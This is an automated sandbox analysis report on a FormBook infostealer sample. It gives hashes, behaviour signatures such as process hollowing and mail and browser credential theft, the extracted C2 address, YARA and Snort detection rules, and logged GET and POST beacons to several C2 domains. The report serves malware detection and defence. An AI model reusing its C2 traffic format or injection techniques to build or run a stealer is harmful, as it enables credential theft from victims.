Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NHYGUnNN.exe

Overview

General Information

Sample Name:NHYGUnNN.exe
Analysis ID:756156
MD5:4f9c8432b57fa1aa875071de547ba947
SHA1:e1cc52fd851621743ba562a65161bfafed8e6b2b
SHA256:9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • NHYGUnNN.exe (PID: 5380 cmdline: C:\Users\user\Desktop\NHYGUnNN.exe MD5: 4F9C8432B57FA1AA875071DE547BA947)
    • RegSvcs.exe (PID: 5148 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4844 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.needook.com/4u5a/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6631:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17e07:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa49a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 18 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.2.6154.209.6.24149722802829004 11/29/22-18:25:42.914102
      SID:2829004
      Source Port:49722
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: NHYGUnNN.exeReversingLabs: Detection: 27%
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Machine Learning detection for sample
      Source: NHYGUnNN.exeJoe Sandbox ML: detected
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.needook.com/4u5a/"]}
      Source: NHYGUnNN.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose,10_2_00BD2CA0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi10_2_00BC88B0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi10_2_00BC88AF
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi10_2_00BC4376

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 38.55.236.89 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.darkchocolatebliss.com
      Source: C:\Windows\explorer.exeDomain query: www.marketmall.digital
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.132 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 54.38.220.85 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.209.6.241 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 89.31.143.1 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.canadianlocalbusiness.com
      Source: C:\Windows\explorer.exeDomain query: www.y31jaihdb6zm87.buzz
      Source: C:\Windows\explorer.exeNetwork Connect: 162.213.255.142 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.ope-cctv.com
      Source: C:\Windows\explorer.exeDomain query: www.dersameh.com
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.6:49722 -> 154.209.6.241:80
      Uses netstat to query active network connections and open ports
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.needook.com/4u5a/
      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
      Source: Joe Sandbox ViewASN Name: QSC-AG-IPXDE QSC-AG-IPXDE
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1Host: www.ope-cctv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1Host: www.dersameh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1Host: www.marketmall.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 89.31.143.1 89.31.143.1
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 68 33 51 7a 33 64 38 52 56 63 28 78 65 5a 48 51 72 49 4b 6a 35 72 69 31 30 7a 6b 55 6a 6e 4b 5f 76 50 42 77 58 79 41 4e 31 31 4c 5a 69 66 43 4f 65 62 76 51 28 46 72 2d 79 39 61 42 78 70 37 55 33 62 66 33 75 73 6a 64 59 46 44 46 4c 53 54 6c 62 51 56 4f 64 6d 47 65 53 45 55 61 4b 4c 70 4a 28 52 4f 47 57 51 61 4c 61 65 35 64 4a 72 4b 59 73 41 67 48 56 43 37 62 4b 61 71 44 33 43 35 39 28 5a 51 68 4a 7a 30 6c 42 72 68 38 62 6c 64 50 42 43 46 37 79 47 42 46 59 65 4b 2d 69 72 38 4b 6c 5a 4e 72 7e 63 62 44 68 78 61 54 7a 5f 4f 49 4e 79 6e 37 54 6f 57 4d 7e 73 51 33 6f 50 6f 4c 61 70 4f 41 33 41 36 30 6e 4f 67 6a 46 4d 57 69 72 52 4c 68 35 30 69 78 72 4b 6a 41 64 51 72 76 36 51 53 37 6a 33 51 72 53 5f 7e 5a 73 30 38 36 72 45 34 52 74 77 56 4c 7a 48 6d 4d 54 4b 7e 44 62 58 62 5f 4e 51 47 6d 69 62 37 4a 46 4e 49 55 53 47 36 39 74 48 4a 75 4d 64 63 5f 63 2d 30 61 55 6e 6b 4c 58 46 54 48 31 5a 48 61 49 6e 42 50 63 37 65 6f 55 4e 79 2d 6f 4f 34 61 6a 38 53 65 47 5f 66 6a 65 70 7a 71 69 72 65 46 6f 44 53 51 5a 31 74 76 65 43 57 71 57 6d 32 4f 69 5a 51 4b 78 5f 38 31 67 48 51 72 53 7a 43 5f 63 6a 63 4c 64 6a 46 69 62 35 41 74 55 49 7e 67 34 53 52 48 51 5a 7a 51 75 52 59 41 62 39 50 35 79 66 54 4d 61 4b 38 61 4b 73 72 69 64 78 4d 68 30 77 48 61 76 69 5a 45 5a 68 42 30 78 35 41 32 4f 70 46 66 33 6c 55 54 70 61 71 31 56 4e 36 42 38 52 34 6f 63 44 58 31 7e 74 6f 68 7a 68 4e 56 46 63 61 69 34 6e 47 78 79 32 45 62 6a 65 38 49 7e 37 48 62 31 7a 65 79 61 6f 4d 6b 43 77 5a 42 69 65 30 4c 41 69 56 63 30 74 46 76 42 53 31 47 79 67 55 2d 46 42 64 46 33 65 4c 4f 4d 2d 28 44 34 78 4f 71 70 4b 5a 5f 39 2d 42 67 73 47 79 77 64 33 57 70 7e 53 52 35 36 6b 7a 6e 56 52 4e 77 6f 44 6d 55 72 6e 50 43 48 42 31 42 7e 65 6e 4b 32 55 44 44 6c 71 32 71 62 32 42 6d 4a 51 7a 58 67 6e 35 2d 52 2d 48 55 56 50 57 6b 62 44 5a 71 49 61 6e 33 68 53 57 55 4e 62 50 55 52 39 6d 47 57 41 62 6b 37 48 55 58 4b 46 7e 36 4b 41 34 5f 41 34 5a 70 56 42 49 47 39 54 66 30 75 31 5a 4b 34 69 49 36 4f 44 49 59 39 73 48 7a 71 6a 7e 78 6a 52 36 44 4d 79 50 69 54 5a 4d 39 39 5f 63 6f 63 63 65 46 74 6e 54 58 32 31 47 35 75 5f 7e 33 6f 30 71 72 6a 57 7a 79 4b 49 52 5f 4b 54 6d 62 28 5f 66 41 79 37 32 45 7a 51 4a 43 75 44 7e 32 28 53 49 75 65 47 30 52 43 55 4c 56 41 33 65 59 7e 46 4d 6d 77 51 59 71 72 56 45 61 44 52 71 61 53 6a 77 57 44 57 28 72 76 69 67 31 4e 77 73 77 7a 65 34 34 73 50 7e 46 4e 34 4e 50 48 46 66 55 30 55 33 54 62 2d 4c 42 6a 37 78 4d 34 76 34 66 75 2d 62 36 50 63 41 7a 6b 59 34 64 50 67 48 56 52 30 72 39 68 75 71 6d 33 55 4e 66 30 69 78 4d 41 58 4a 75 7a 6
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 71 4e 67 47 36 79 57 44 69 72 48 68 79 33 54 50 70 4d 63 69 4e 37 30 42 7e 43 65 42 52 4b 77 31 74 30 41 47 57 35 77 36 33 42 7a 51 7e 68 75 4b 4d 2d 36 30 32 65 70 42 77 49 69 43 6b 59 30 75 6a 58 61 44 67 55 67 47 47 78 4a 44 4b 75 35 38 78 4d 37 7a 54 34 4b 56 77 5f 4a 54 7e 65 61 5f 6c 47 67 50 36 69 62 4b 6f 64 64 31 76 4e 33 69 49 64 5a 35 69 52 4e 56 6a 6c 44 76 44 59 50 6c 54 6e 72 6b 4a 64 6e 5a 38 46 6a 78 68 7a 74 6e 71 5a 47 44 30 4e 61 36 58 50 6b 69 36 31 46 53 36 30 77 69 56 41 28 74 69 70 30 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=kxk-HEmuCelWqNgG6yWDirHhy3TPpMciN70B~CeBRKw1t0AGW5w63BzQ~huKM-602epBwIiCkY0ujXaDgUgGGxJDKu58xM7zT4KVw_JT~ea_lGgP6ibKodd1vN3iIdZ5iRNVjlDvDYPlTnrkJdnZ8FjxhztnqZGD0Na6XPki61FS60wiVA(tip0.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 6f 75 6f 47 34 54 57 44 7a 62 48 2d 73 48 54 50 77 63 63 6d 4e 37 34 42 7e 47 47 52 52 38 51 31 73 6d 34 47 58 61 49 36 36 68 7a 51 70 78 75 4f 50 4f 37 32 32 65 39 4e 77 4a 54 67 6b 61 59 75 69 30 69 44 6d 57 49 48 66 52 4a 64 64 4f 35 7a 78 4d 37 63 54 34 61 52 77 5f 4d 49 7e 61 32 5f 6c 56 59 50 72 79 62 4c 6e 39 64 31 76 4e 33 75 49 64 59 6f 69 58 6c 33 6a 6b 4c 46 43 71 48 6c 54 43 6e 6b 61 71 62 59 30 6c 69 34 28 44 73 72 73 4c 66 75 73 37 62 4f 66 2d 41 61 73 33 46 4f 36 57 46 52 51 79 37 47 33 4a 63 38 35 6a 52 69 32 67 73 52 4a 4e 6f 33 6e 61 41 5a 4f 74 6c 2d 54 42 74 44 7a 4a 66 65 42 31 34 61 44 4d 6b 37 74 79 6a 56 62 49 36 77 57 59 39 30 73 36 28 30 44 57 50 35 4a 61 6f 79 78 72 4a 76 64 65 49 30 28 4f 54 4c 46 48 34 70 44 7a 6e 34 28 32 6f 78 7a 4f 62 71 73 6b 33 49 59 36 63 45 30 76 47 78 71 39 35 33 65 4b 6f 43 41 33 4d 41 6e 75 44 36 4a 49 4a 67 6a 66 65 5f 42 4d 47 77 4b 54 72 4a 6e 38 6c 5f 36 63 49 41 6b 50 4d 70 77 43 6d 32 6e 53 75 57 7a 7a 50 30 73 47 61 77 54 4f 52 63 31 53 38 69 76 33 75 30 51 70 62 37 34 6b 6b 6a 32 67 38 39 72 58 68 32 55 75 39 48 51 49 58 6b 43 35 75 44 73 6f 7e 78 6d 59 51 54 46 4e 70 55 41 35 68 54 59 5a 63 57 79 58 41 70 4e 6e 72 5f 72 6b 38 58 63 50 66 51 70 34 34 37 6b 6e 28 71 50 32 6b 57 52 36 37 69 53 6f 76 67 77 44 6f 53 4f 35 54 34 56 54 73 4e 68 76 46 4b 6a 38 4e 34 63 71 4e 53 59 33 33 57 4a 32 4a 73 64 67 70 47 41 78 39 6a 34 38 77 37 67 51 7a 32 46 49 44 72 34 71 63 59 44 45 72 71 75 31 38 30 39 33 57 36 5a 72 6f 47 76 50 79 69 70 6b 45 42 57 68 35 32 51 78 4c 31 37 5a 64 65 4c 46 73 76 52 69 61 42 62 75 59 4a 55 5a 6e 52 56 4b 4e 5a 34 42 7e 35 51 67 58 79 57 6e 4c 79 62 2d 72 31 77 74 47 36 5a 74 70 53 4e 78 59 49 65 6d 41 42 56 7a 75 2d 66 65 4c 41 77 43 71 53 53 4b 71 52 49 37 46 67 7e 6c 50 53 59 55 4b 69 47 44 38 73 43 75 38 33 4b 30 4d 66 38 66 4f 37 38 6f 46 50 42 69 37 58 46 72 59 75 5a 4e 53 45 4b 38 7a 71 38 5f 56 50 79 78 34 47 67 67 75 52 54 43 61 77 33 4b 6f 5f 54 46 48 49 5a 59 58 58 5a 43 32 67 38 34 71 74 73 42 66 75 72 41 45 34 6e 43 38 75 48 71 62 42 36 34 78 42 38 45 30 38 77 46 6b 35 67 42 33 66 30 4a 58 71 54 38 49 71 75 51 41 78 6b 6a 6c 67 54 33 4d 6b 49 69 66 56 28 39 43 39 50 7a 44 35 32 30 7a 69 64 61 67 47 4c 4f 4d 43 61 68 56 68 64 54 47 5a 47 43 6b 35 55 76 65 76 28 57 30 76 65 59 5a 74 7e 37 74 37 61 53 57 68 30 65 51 6c 33 6e 7e 57 65 45 50 79 74 31 79 6b 32 69 74 74 5a 73 4c 61 61 77 62 4a 61 4e 30 43 4a 54 6c 46 78 44 73 53 47 50 78 6d 78 7a 47 62 6f 65 46 41 63 6b 64 6c 53 62 30 3
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
